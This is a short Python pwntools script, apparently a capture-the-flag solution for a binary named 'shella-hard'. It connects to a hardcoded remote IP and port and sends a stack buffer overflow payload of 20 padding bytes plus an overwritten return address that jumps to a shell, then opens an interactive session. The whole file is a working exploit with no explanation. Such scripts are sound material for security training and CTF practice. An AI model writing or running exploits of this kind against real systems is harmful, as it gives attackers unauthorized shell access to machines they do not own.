#!/usr/bin/python
from pwn import *
#______________________________________________________________________________________________________________
rem = "3.16.169.157 12345"
cmd = "./shella-hard"
local = 0
#______________________________________________________________________________________________________________
if bool(local): p = process(cmd.split(' ')); raw_input("-PID");
else: rem = rem.split(' '); p = remote(rem[0], rem[1])
#______________________________________________________________________________________________________________

shell = 0x0804845e
payload = "A"*20 + p32(shell)
p.send(payload)
p.interactive()

#______________________________________________________________________________________________________________
if bool(local): raw_input("-END")
p.close()
